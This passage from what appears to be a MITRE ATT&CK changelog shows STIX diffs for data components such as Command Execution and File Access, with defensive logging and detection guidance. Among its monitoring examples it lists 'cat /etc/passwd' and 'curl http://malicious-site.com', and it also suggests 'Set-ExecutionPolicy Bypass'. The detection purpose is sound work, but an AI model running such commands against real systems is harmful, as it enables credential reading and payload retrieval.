- `/var/log/syslog`, `/var/log/auth.log`, `/var/log/kern.log`
- Journald (journalctl) for kernel and system alerts.
- Endpoint Detection and Response (EDR) Tools:
- Monitor agent health status, detect sensor tampering, and alert on missing telemetry.
- Mobile Threat Intelligence Logs:
- Samsung Knox, SafetyNet, iOS Secure Enclave provide sensor health status for mobile endpoints. |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Application Vetting: Network Communication
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-13T19:59:42.141Z | 2025-04-16T21:22:21.724Z |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
User Interface: Permissions Request
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-13T20:47:24.038Z | 2025-04-16T21:22:21.873Z |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
Application Vetting: Permissions Requests
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-13T20:00:08.487Z | 2025-04-16T21:22:21.394Z |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
Process: Process Metadata
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['ics-attack', 'mobile-attack', 'enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.272Z | 2025-04-18T15:10:37.873Z |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Application Vetting: Protected Configuration
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-13T20:00:38.029Z | 2025-04-16T21:22:22.260Z |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
User Interface: System Notifications
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-13T20:47:52.557Z | 2025-04-16T21:22:22.106Z |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
User Interface: System Settings
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-13T20:48:14.540Z | 2025-04-16T21:22:21.541Z |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
ics-attack
Minor Version Changes
Application Log: Application Log Content
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Logging, messaging, and other artifacts provided by third-pa | t | Application Log Content refers to logs generated by applicat |
| rty services (ex: metrics, errors, and/or alerts from mail/w | | ions or services, providing a record of their activity. Thes |
| eb applications) | | e logs may include metrics, errors, performance data, and op |
| | | erational alerts from web, mail, or other applications. Thes |
| | | e logs are vital for monitoring application behavior and det |
| | | ecting malicious activities or anomalies. Examples: - Web |
| | | Application Logs: These logs include information about reque |
| | | sts, responses, errors, and security events (e.g., unauthori |
| | | zed access attempts). - Email Application Logs: Logs contain |
| | | metadata about emails sent, received, or blocked (e.g., sen |
| | | der/receiver addresses, message IDs). - SaaS Application Log |
| | | s: Activity logs include user logins, configuration changes, |
| | | and access to sensitive resources. - Cloud Application Logs |
| | | : Logs detail control plane activities, including API calls, |
| | | instance modifications, and network changes. - System/Appli |
| | | cation Monitoring Logs: Logs provide insights into applicati |
| | | on performance, errors, and anomalies. This data component |
| | | can be collected through the following measures: Configure |
| | | Application Logging - Enable logging within the application |
| | | or service. - Examples: - Web Servers: Enable access an |
| | | d error logs in NGINX or Apache. - Email Systems: Enable |
| | | audit logging in Microsoft Exchange or Gmail. Centralized |
| | | Log Management - Use log management solutions like Splunk, |
| | | or a cloud-native logging solution. - Configure the applicat |
| | | ion to send logs to a centralized system for analysis. Clou |
| | | d-Specific Collection - Use services like AWS CloudWatch, A |
| | | zure Monitor, or Google Cloud Operations Suite for cloud-bas |
| | | ed applications. - Ensure logging is enabled for all critica |
| | | l resources (e.g., API calls, IAM changes). SIEM Integratio |
| | | n - Integrate application logs with a SIEM platform (e.g., |
| | | Splunk, QRadar) for real-time correlation and analysis. - Us |
| | | e parsers to standardize log formats and extract key fields |
| | | like timestamps, user IDs, and error codes. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.272Z | 2025-04-18T15:09:35.474Z |
| description | Logging, messaging, and other artifacts provided by third-party services (ex: metrics, errors, and/or alerts from mail/web applications) | Application Log Content refers to logs generated by applications or services, providing a record of their activity. These logs may include metrics, errors, performance data, and operational alerts from web, mail, or other applications. These logs are vital for monitoring application behavior and detecting malicious activities or anomalies. Examples:
- Web Application Logs: These logs include information about requests, responses, errors, and security events (e.g., unauthorized access attempts).
- Email Application Logs: Logs contain metadata about emails sent, received, or blocked (e.g., sender/receiver addresses, message IDs).
- SaaS Application Logs: Activity logs include user logins, configuration changes, and access to sensitive resources.
- Cloud Application Logs: Logs detail control plane activities, including API calls, instance modifications, and network changes.
- System/Application Monitoring Logs: Logs provide insights into application performance, errors, and anomalies.
This data component can be collected through the following measures:
Configure Application Logging
- Enable logging within the application or service.
- Examples:
- Web Servers: Enable access and error logs in NGINX or Apache.
- Email Systems: Enable audit logging in Microsoft Exchange or Gmail.
Centralized Log Management
- Use log management solutions like Splunk, or a cloud-native logging solution.
- Configure the application to send logs to a centralized system for analysis.
Cloud-Specific Collection
- Use services like AWS CloudWatch, Azure Monitor, or Google Cloud Operations Suite for cloud-based applications.
- Ensure logging is enabled for all critical resources (e.g., API calls, IAM changes).
SIEM Integration
- Integrate application logs with a SIEM platform (e.g., Splunk, QRadar) for real-time correlation and analysis.
- Use parsers to standardize log formats and extract key fields like timestamps, user IDs, and error codes. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Command: Command Execution
Current version: 1.2
Version changed from: 1.1 → 1.2
|
|
|---|
| t | The execution of a line of text, potentially with arguments, | t | Command Execution involves monitoring and capturing the exec |
| created from program code (e.g. a cmdlet executed via power | | ution of textual commands (including shell commands, cmdlets |
| shell.exe, interactive commands like >dir, shell executions, | | , and scripts) within an operating system or application. Th |
| etc. ) | | ese commands may include arguments or parameters and are typ |
| | | ically executed through interpreters such as `cmd.exe`, `bas |
| | | h`, `zsh`, `PowerShell`, or programmatic execution. Examples |
| | | : - Windows Command Prompt - dir – Lists directory con |
| | | tents. - net user – Queries or manipulates user accounts |
| | | . - tasklist – Lists running processes. - PowerShell |
| | | - Get-Process – Retrieves processes running on a system. |
| | | - Set-ExecutionPolicy – Changes PowerShell script executio |
| | | n policies. - Invoke-WebRequest – Downloads remote resou |
| | | rces. - Linux Shell - ls – Lists files in a directory. |
| | | - cat /etc/passwd – Reads the user accounts file. - c |
| | | url http://malicious-site.com – Retrieves content from a mal |
| | | icious URL. - Container Environments - docker exec – Exe |
| | | cutes a command inside a running container. - kubectl ex |
| | | ec – Runs commands in Kubernetes pods. - macOS Terminal |
| | | - open – Opens files or URLs. - dscl . -list /Users – Li |
| | | sts all users on the system. - osascript -e – Executes A |
| | | ppleScript commands. This data component can be collected t |
| | | hrough the following measures: Enable Command Logging - Wi |
| | | ndows: - Enable PowerShell logging: `Set-ExecutionPolicy |
| | | Bypass`, `Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\M |
| | | icrosoft\Windows\PowerShell\ScriptBlockLogging" -Name Enable |
| | | ScriptBlockLogging -Value 1` - Enable Windows Event Logg |
| | | ing: - Event ID 4688: Tracks process creation, inclu |
| | | ding command-line arguments. - Event ID 4104: Logs P |
| | | owerShell script block execution. - Linux/macOS: - Enabl |
| | | e shell history logging in `.bashrc` or `.zshrc`: `export HI |
| | | STTIMEFORMAT="%d/%m/%y %T "`, `export PROMPT_COMMAND='histor |
| | | y -a; history -w'` - Use audit frameworks (e.g., `auditd |
| | | `) to log command executions. Example rule to log all `execv |
| | | e` syscalls: `-a always,exit -F arch=b64 -S execve -k cmd_ex |
| | | ec` - Containers: - Use runtime-specific tools like Dock |
| | | er’s --log-driver or Kubernetes Audit Logs to capture exec c |
| | | ommands. Integrate with Centralized Logging - Collect logs |
| | | using a SIEM (e.g., Splunk) or cloud-based log aggregation |
| | | tools like AWS CloudWatch or Azure Monitor. Example Splunk S |
| | | earch for Windows Event 4688: `index=windows EventID=4688 Co |
| | | mmandLine=*` Use Endpoint Detection and Response (EDR) Tool |
| | | s - Monitor command executions via EDR solutions Deploy S |
| | | ysmon for Advanced Logging (Windows) - Use Sysmon's Event I |
| | | D 1 to log process creation with command-line arguments |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_domains | | ['ics-attack', 'mobile-attack', 'enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-07T16:14:39.124Z | 2025-04-18T15:11:30.145Z |
| description | The execution of a line of text, potentially with arguments, created from program code (e.g. a cmdlet executed via powershell.exe, interactive commands like >dir, shell executions, etc. ) | Command Execution involves monitoring and capturing the execution of textual commands (including shell commands, cmdlets, and scripts) within an operating system or application. These commands may include arguments or parameters and are typically executed through interpreters such as `cmd.exe`, `bash`, `zsh`, `PowerShell`, or programmatic execution. Examples:
- Windows Command Prompt
- dir – Lists directory contents.
- net user – Queries or manipulates user accounts.
- tasklist – Lists running processes.
- PowerShell
- Get-Process – Retrieves processes running on a system.
- Set-ExecutionPolicy – Changes PowerShell script execution policies.
- Invoke-WebRequest – Downloads remote resources.
- Linux Shell
- ls – Lists files in a directory.
- cat /etc/passwd – Reads the user accounts file.
- curl http://malicious-site.com – Retrieves content from a malicious URL.
- Container Environments
- docker exec – Executes a command inside a running container.
- kubectl exec – Runs commands in Kubernetes pods.
- macOS Terminal
- open – Opens files or URLs.
- dscl . -list /Users – Lists all users on the system.
- osascript -e – Executes AppleScript commands.
This data component can be collected through the following measures:
Enable Command Logging
- Windows:
- Enable PowerShell logging: `Set-ExecutionPolicy Bypass`, `Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name EnableScriptBlockLogging -Value 1`
- Enable Windows Event Logging:
- Event ID 4688: Tracks process creation, including command-line arguments.
- Event ID 4104: Logs PowerShell script block execution.
- Linux/macOS:
- Enable shell history logging in `.bashrc` or `.zshrc`: `export HISTTIMEFORMAT="%d/%m/%y %T "`, `export PROMPT_COMMAND='history -a; history -w'`
- Use audit frameworks (e.g., `auditd`) to log command executions. Example rule to log all `execve` syscalls: `-a always,exit -F arch=b64 -S execve -k cmd_exec`
- Containers:
- Use runtime-specific tools like Docker’s --log-driver or Kubernetes Audit Logs to capture exec commands.
Integrate with Centralized Logging
- Collect logs using a SIEM (e.g., Splunk) or cloud-based log aggregation tools like AWS CloudWatch or Azure Monitor. Example Splunk Search for Windows Event 4688:
`index=windows EventID=4688 CommandLine=*`
Use Endpoint Detection and Response (EDR) Tools
- Monitor command executions via EDR solutions
Deploy Sysmon for Advanced Logging (Windows)
- Use Sysmon's Event ID 1 to log process creation with command-line arguments |
| x_mitre_version | 1.1 | 1.2 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Drive: Drive Creation
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Initial construction of a drive letter or mount point to a d | t | The activity of assigning a new drive letter or creating a m |
| ata storage device | | ount point for a data storage device, such as a USB, network |
| | | share, or external hard drive, enabling access to its conte |
| | | nt on a host system. Examples: - USB Drive Insertion: A US |
| | | B drive is plugged in and automatically assigned the letter |
| | | `E:\` on a Windows machine. - Network Drive Mapping: A netwo |
| | | rk share `\\server\share` is mapped to the drive `Z:\`. - Vi |
| | | rtual Drive Creation: A virtual disk is mounted on `/mnt/vir |
| | | tualdrive` using an ISO image or a virtual hard disk (VHD). |
| | | - Cloud Storage Mounting: Google Drive is mounted as `G:\` o |
| | | n a Windows machine using a cloud sync tool. - External Stor |
| | | age Integration: An external HDD or SSD is connected and ass |
| | | igned `/mnt/external` on a Linux system. This data componen |
| | | t can be collected through the following measures: Windows |
| | | Event Logs - Relevant Events: - Event ID 98: Logs the c |
| | | reation of a volume (mount or new drive letter assignment). |
| | | - Event ID 1006: Logs removable storage device insertion |
| | | s. - Configuration: Enable "Removable Storage Events" in the |
| | | Group Policy settings: `Computer Configuration > Administra |
| | | tive Templates > System > Removable Storage Access` Linux S |
| | | ystem Logs - Command-Line Monitoring: Use `dmesg` or `journ |
| | | alctl` to monitor mount events. - Auditd Configuration: Add |
| | | audit rules to track mount points. - Logs can be reviewed i |
| | | n /var/log/audit/audit.log. macOS System Logs - Unified Lo |
| | | gs: Monitor system logs for mount activity: - Command-Line T |
| | | ools: Use `diskutil list` to verify newly created or mounted |
| | | drives. Endpoint Detection and Response (EDR) Tools - EDR |
| | | solutions can log removable drive usage and network-mounted |
| | | drives. Configure EDR policies to alert on suspicious drive |
| | | creation events. SIEM Tools - Centralize logs from multip |
| | | le platforms into a SIEM (e.g., Splunk) to correlate and ale |
| | | rt on suspicious drive creation activities. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.273Z | 2025-04-18T15:12:36.536Z |
| description | Initial construction of a drive letter or mount point to a data storage device | The activity of assigning a new drive letter or creating a mount point for a data storage device, such as a USB, network share, or external hard drive, enabling access to its content on a host system. Examples:
- USB Drive Insertion: A USB drive is plugged in and automatically assigned the letter `E:\` on a Windows machine.
- Network Drive Mapping: A network share `\\server\share` is mapped to the drive `Z:\`.
- Virtual Drive Creation: A virtual disk is mounted on `/mnt/virtualdrive` using an ISO image or a virtual hard disk (VHD).
- Cloud Storage Mounting: Google Drive is mounted as `G:\` on a Windows machine using a cloud sync tool.
- External Storage Integration: An external HDD or SSD is connected and assigned `/mnt/external` on a Linux system.
This data component can be collected through the following measures:
Windows Event Logs
- Relevant Events:
- Event ID 98: Logs the creation of a volume (mount or new drive letter assignment).
- Event ID 1006: Logs removable storage device insertions.
- Configuration: Enable "Removable Storage Events" in the Group Policy settings:
`Computer Configuration > Administrative Templates > System > Removable Storage Access`
Linux System Logs
- Command-Line Monitoring: Use `dmesg` or `journalctl` to monitor mount events.
- Auditd Configuration: Add audit rules to track mount points.
- Logs can be reviewed in /var/log/audit/audit.log.
macOS System Logs
- Unified Logs: Monitor system logs for mount activity:
- Command-Line Tools: Use `diskutil list` to verify newly created or mounted drives.
Endpoint Detection and Response (EDR) Tools
- EDR solutions can log removable drive usage and network-mounted drives. Configure EDR policies to alert on suspicious drive creation events.
SIEM Tools
- Centralize logs from multiple platforms into a SIEM (e.g., Splunk) to correlate and alert on suspicious drive creation activities. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Drive: Drive Modification
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Changes made to a drive letter or mount point of a data stor | t | The alteration of a drive letter, mount point, or other attr |
| age device | | ibutes of a data storage device, which could involve reassig |
| | | nment, renaming, permissions changes, or other modifications |
| | | . Examples: - Drive Letter Reassignment: A USB drive previ |
| | | ously assigned `E:\` is reassigned to `D:\` on a Windows mac |
| | | hine. - Mount Point Change: On a Linux system, a mounted sto |
| | | rage device at `/mnt/external` is moved to `/mnt/storage`. - |
| | | Drive Permission Changes: A shared drive's permissions are |
| | | modified to allow write access for unauthorized users or pro |
| | | cesses. - Renaming of a Drive: A network drive labeled "HR_S |
| | | hare" is renamed to "Shared_Resources." - Modification of Cl |
| | | oud-Integrated Drives: A cloud storage mount such as Google |
| | | Drive is modified to sync only specific folders. This data |
| | | component can be collected through the following measures: |
| | | Windows Event Logs - Relevant Events: - Event ID 98: In |
| | | dicates changes to a volume (e.g., drive letter reassignment |
| | | ). - Event ID 1006: Logs permission modifications or cha |
| | | nges to removable storage. - Configuration: Enable "Storage |
| | | Operational Logs" in the Event Viewer: `Applications and Ser |
| | | vices Logs > Microsoft > Windows > Storage-Tiering > Operati |
| | | onal` Linux System Logs - Auditd Configuration: Add audit |
| | | rules to track changes to mounted drives: `auditctl -w /mnt/ |
| | | -p w -k drive_modification` - Command-Line Monitoring: Use |
| | | `dmesg` or `journalctl` to observe drive modifications. mac |
| | | OS System Logs - Unified Logs: Collect mount or drive modif |
| | | ication events: `log show --info | grep "Volume modified"` - |
| | | Command-Line Monitoring: Use `diskutil` to track changes: |
| | | Endpoint Detection and Response (EDR) Tools - Configure pol |
| | | icies in EDR solutions to monitor and log changes to drive c |
| | | onfigurations or attributes. SIEM Tools - Aggregate logs f |
| | | rom multiple systems into a centralized platform like Splunk |
| | | to correlate events and alert on suspicious drive modificat |
| | | ion activities. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.273Z | 2025-04-18T15:12:35.797Z |
| description | Changes made to a drive letter or mount point of a data storage device | The alteration of a drive letter, mount point, or other attributes of a data storage device, which could involve reassignment, renaming, permissions changes, or other modifications. Examples:
- Drive Letter Reassignment: A USB drive previously assigned `E:\` is reassigned to `D:\` on a Windows machine.
- Mount Point Change: On a Linux system, a mounted storage device at `/mnt/external` is moved to `/mnt/storage`.
- Drive Permission Changes: A shared drive's permissions are modified to allow write access for unauthorized users or processes.
- Renaming of a Drive: A network drive labeled "HR_Share" is renamed to "Shared_Resources."
- Modification of Cloud-Integrated Drives: A cloud storage mount such as Google Drive is modified to sync only specific folders.
This data component can be collected through the following measures:
Windows Event Logs
- Relevant Events:
- Event ID 98: Indicates changes to a volume (e.g., drive letter reassignment).
- Event ID 1006: Logs permission modifications or changes to removable storage.
- Configuration: Enable "Storage Operational Logs" in the Event Viewer:
`Applications and Services Logs > Microsoft > Windows > Storage-Tiering > Operational`
Linux System Logs
- Auditd Configuration: Add audit rules to track changes to mounted drives: `auditctl -w /mnt/ -p w -k drive_modification`
- Command-Line Monitoring: Use `dmesg` or `journalctl` to observe drive modifications.
macOS System Logs
- Unified Logs: Collect mount or drive modification events: `log show --info | grep "Volume modified"`
- Command-Line Monitoring: Use `diskutil` to track changes:
Endpoint Detection and Response (EDR) Tools
- Configure policies in EDR solutions to monitor and log changes to drive configurations or attributes.
SIEM Tools
- Aggregate logs from multiple systems into a centralized platform like Splunk to correlate events and alert on suspicious drive modification activities.
|
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
File: File Access
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Opening a file, which makes the file contents available to t | t | To events where a file is opened or accessed, making its con |
| he requestor (ex: Windows EID 4663) | | tents available to the requester. This includes reading, exe |
| | | cuting, or interacting with files by authorized or unauthori |
| | | zed entities. Examples include logging file access events (e |
| | | .g., Windows Event ID 4663), monitoring file reads, and dete |
| | | cting unusual file access patterns. Examples: - File Read |
| | | Operations: A user opens a sensitive document (e.g., financi |
| | | al_report.xlsx) on a shared drive. - File Execution: A scrip |
| | | t or executable file is accessed and executed (e.g., malware |
| | | .exe is run from a temporary directory). - Unauthorized File |
| | | Access: An unauthorized user attempts to access a protected |
| | | configuration file (e.g., `/etc/passwd` on Linux or `System |
| | | 32` files on Windows). - File Access Patterns: Bulk access t |
| | | o multiple files in a short time (e.g., mass access to docum |
| | | ents on a file server). - File Access via Network: Files on |
| | | a network share are accessed remotely (e.g., logs of SMB fil |
| | | e access). This data component can be collected through the |
| | | following measures: Windows - Windows Event Logs: Event I |
| | | D 4663: Captures file system auditing details, including who |
| | | accessed the file, access type, and file name. - Sysmon: |
| | | - Event ID 11: Logs file creation time changes. - Even |
| | | t ID 1 (process creation): Can provide insight into files ex |
| | | ecuted. - PowerShell: Commands to monitor file access in rea |
| | | l-time: `Get-WinEvent -FilterHashtable @{LogName='Security'; |
| | | ID=4663}` Linux - Auditd: Monitor file access events usin |
| | | g audit rules: `auditctl -w /path/to/file -p rwxa -k file_ac |
| | | cess` - View logs: `ausearch -k file_access` - Inotify: Use |
| | | inotify to track file access on Linux: `inotifywait -m /path |
| | | /to/watch -e access` macOS - Unified Logs: Monitor file ac |
| | | cess using the macOS Unified Logging System. - FSEvents: Fil |
| | | e System Events can track file accesses: `fs_usage | grep op |
| | | en` Network Devices - SMB/CIFS Logs: Monitor file access o |
| | | ver network shares using logs from SMB or CIFS protocol. - N |
| | | AS Logs: Collect logs from network-attached storage systems |
| | | for file access events. SIEM Integration - Collect file ac |
| | | cess logs from all platforms (Windows, Linux, macOS) and cen |
| | | tralize in a SIEM for correlation and analysis. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.273Z | 2025-04-18T15:10:07.996Z |
| description | Opening a file, which makes the file contents available to the requestor (ex: Windows EID 4663) | To events where a file is opened or accessed, making its contents available to the requester. This includes reading, executing, or interacting with files by authorized or unauthorized entities. Examples include logging file access events (e.g., Windows Event ID 4663), monitoring file reads, and detecting unusual file access patterns. Examples:
- File Read Operations: A user opens a sensitive document (e.g., financial_report.xlsx) on a shared drive.
- File Execution: A script or executable file is accessed and executed (e.g., malware.exe is run from a temporary directory).
- Unauthorized File Access: An unauthorized user attempts to access a protected configuration file (e.g., `/etc/passwd` on Linux or `System32` files on Windows).
- File Access Patterns: Bulk access to multiple files in a short time (e.g., mass access to documents on a file server).
- File Access via Network: Files on a network share are accessed remotely (e.g., logs of SMB file access).
This data component can be collected through the following measures:
Windows
- Windows Event Logs: Event ID 4663: Captures file system auditing details, including who accessed the file, access type, and file name.
- Sysmon:
- Event ID 11: Logs file creation time changes.
- Event ID 1 (process creation): Can provide insight into files executed.
- PowerShell: Commands to monitor file access in real-time: `Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4663}`
Linux
- Auditd: Monitor file access events using audit rules: `auditctl -w /path/to/file -p rwxa -k file_access`
- View logs: `ausearch -k file_access`
- Inotify: Use inotify to track file access on Linux: `inotifywait -m /path/to/watch -e access`
macOS
- Unified Logs: Monitor file access using the macOS Unified Logging System.
- FSEvents: File System Events can track file accesses: `fs_usage | grep open`
Network Devices
- SMB/CIFS Logs: Monitor file access over network shares using logs from SMB or CIFS protocol.
- NAS Logs: Collect logs from network-attached storage systems for file access events.
SIEM Integration
- Collect file access logs from all platforms (Windows, Linux, macOS) and centralize in a SIEM for correlation and analysis. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
File: File Creation
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Initial construction of a new file (ex: Sysmon EID 11) | t | A new file is created on a system or network storage. This a |
| | | ction often signifies an operation such as saving a document |
| | | , writing data, or deploying a file. Logging these events he |
| | | lps identify legitimate or potentially malicious file creati |
| | | on activities. Examples include logging file creation events |
| | | (e.g., Sysmon Event ID 11 or Linux auditd logs). This dat |
| | | a component can be collected through the following measures: |
| | | Windows - Sysmon: Event ID 11: Logs file creation events, |
| | | capturing details like the file path, hash, and creation ti |
| | | me. - Windows Event Log: Enable "Object Access" auditing in |
| | | Group Policy to track file creation under Event ID 4663. - P |
| | | owerShell: Real-time monitoring of file creation:`Get-WinEve |
| | | nt -FilterHashtable @{LogName='Security'; ID=4663}` Linux |
| | | - Auditd: Use audit rules to monitor file creation: `auditct |
| | | l -w /path/to/directory -p w -k file_creation` - View logs: |
| | | `ausearch -k file_creation` - Inotify: Monitor file creation |
| | | with inotifywait: `inotifywait -m /path/to/watch -e create` |
| | | macOS - Unified Logs: Use the macOS Unified Logging Syste |
| | | m to capture file creation events. - FSEvents: Use File Syst |
| | | em Events to monitor file creation: `fs_usage | grep create` |
| | | Network Devices - NAS Logs: Monitor file creation events |
| | | on network-attached storage devices. - SMB Logs: Collect log |
| | | s of file creation activities over SMB/CIFS protocols. SIEM |
| | | Integration - Forward logs from all platforms (Windows, Li |
| | | nux, macOS) to a SIEM for central analysis and alerting. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.273Z | 2025-04-18T15:10:18.072Z |
| description | Initial construction of a new file (ex: Sysmon EID 11) | A new file is created on a system or network storage. This action often signifies an operation such as saving a document, writing data, or deploying a file. Logging these events helps identify legitimate or potentially malicious file creation activities. Examples include logging file creation events (e.g., Sysmon Event ID 11 or Linux auditd logs).
This data component can be collected through the following measures:
Windows
- Sysmon: Event ID 11: Logs file creation events, capturing details like the file path, hash, and creation time.
- Windows Event Log: Enable "Object Access" auditing in Group Policy to track file creation under Event ID 4663.
- PowerShell: Real-time monitoring of file creation:`Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4663}`
Linux
- Auditd: Use audit rules to monitor file creation: `auditctl -w /path/to/directory -p w -k file_creation`
- View logs: `ausearch -k file_creation`
- Inotify: Monitor file creation with inotifywait: `inotifywait -m /path/to/watch -e create`
macOS
- Unified Logs: Use the macOS Unified Logging System to capture file creation events.
- FSEvents: Use File System Events to monitor file creation: `fs_usage | grep create`
Network Devices
- NAS Logs: Monitor file creation events on network-attached storage devices.
- SMB Logs: Collect logs of file creation activities over SMB/CIFS protocols.
SIEM Integration
- Forward logs from all platforms (Windows, Linux, macOS) to a SIEM for central analysis and alerting. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
File: File Deletion
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Removal of a file (ex: Sysmon EID 23, macOS ESF EID ES_EVENT | t | Refers to events where files are removed from a system or st |
| _TYPE_AUTH_UNLINK, or Linux commands auditd unlink, rename, | | orage device. These events can indicate legitimate housekeep |
| rmdir, unlinked, or renameat rules) | | ing activities or malicious actions such as attackers attemp |
| | | ting to cover their tracks. Monitoring file deletions helps |
| | | organizations identify unauthorized or suspicious activities |
| | | . This data component can be collected through the followin |
| | | g measures: Windows - Sysmon: Event ID 23: Logs file delet |
| | | ion events, including details such as file paths and respons |
| | | ible processes. - Windows Event Log: Enable "Object Access" |
| | | auditing to monitor file deletions. - PowerShell: `Get-WinEv |
| | | ent -FilterHashtable @{LogName='Security'; ID=4663} | Where- |
| | | Object {$_.Message -like '*DELETE*'}` Linux - Auditd: Use |
| | | audit rules to capture file deletion events: `auditctl -a al |
| | | ways,exit -F arch=b64 -S unlink -S rename -S rmdir -k file_d |
| | | eletion` - Query logs: `ausearch -k file_deletion` - Inotify |
| | | : Use inotifywait to monitor file deletions: `inotifywait -m |
| | | /path/to/watch -e delete` macOS - Endpoint Security Frame |
| | | work (ESF): Monitor events like ES_EVENT_TYPE_AUTH_UNLINK to |
| | | capture file deletion activities. - FSEvents: Track file de |
| | | letion activities in real-time: `fs_usage | grep unlink` SI |
| | | EM Integration - Forward file deletion logs to a SIEM for c |
| | | entralized monitoring and correlation with other events. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-03-30T14:26:51.805Z | 2025-04-18T15:10:21.434Z |
| description | Removal of a file (ex: Sysmon EID 23, macOS ESF EID ES_EVENT_TYPE_AUTH_UNLINK, or Linux commands auditd unlink, rename, rmdir, unlinked, or renameat rules) | Refers to events where files are removed from a system or storage device. These events can indicate legitimate housekeeping activities or malicious actions such as attackers attempting to cover their tracks. Monitoring file deletions helps organizations identify unauthorized or suspicious activities.
This data component can be collected through the following measures:
Windows
- Sysmon: Event ID 23: Logs file deletion events, including details such as file paths and responsible processes.
- Windows Event Log: Enable "Object Access" auditing to monitor file deletions.
- PowerShell: `Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4663} | Where-Object {$_.Message -like '*DELETE*'}`
Linux
- Auditd: Use audit rules to capture file deletion events: `auditctl -a always,exit -F arch=b64 -S unlink -S rename -S rmdir -k file_deletion`
- Query logs: `ausearch -k file_deletion`
- Inotify: Use inotifywait to monitor file deletions: `inotifywait -m /path/to/watch -e delete`
macOS
- Endpoint Security Framework (ESF): Monitor events like ES_EVENT_TYPE_AUTH_UNLINK to capture file deletion activities.
- FSEvents: Track file deletion activities in real-time: `fs_usage | grep unlink`
SIEM Integration
- Forward file deletion logs to a SIEM for centralized monitoring and correlation with other events.
|
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
File: File Metadata
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Contextual data about a file, which may include information | t | contextual information about a file, including attributes su |
| such as name, the content (ex: signature, headers, or data/m | | ch as the file's name, size, type, content (e.g., signatures |
| edia), user/owner, permissions, etc. | | , headers, media), user/owner, permissions, timestamps, and |
| | | other related properties. File metadata provides insights in |
| | | to a file's characteristics and can be used to detect malici |
| | | ous activity, unauthorized modifications, or other anomalies |
| | | . Examples: - File Ownership and Permissions: Checking the |
| | | owner and permissions of a critical configuration file like |
| | | /etc/passwd on Linux or C:\Windows\System32\config\SAM on W |
| | | indows. - Timestamps: Analyzing the creation, modification, |
| | | and access timestamps of a file. - File Content and Signatur |
| | | es: Extracting the headers of an executable file to verify i |
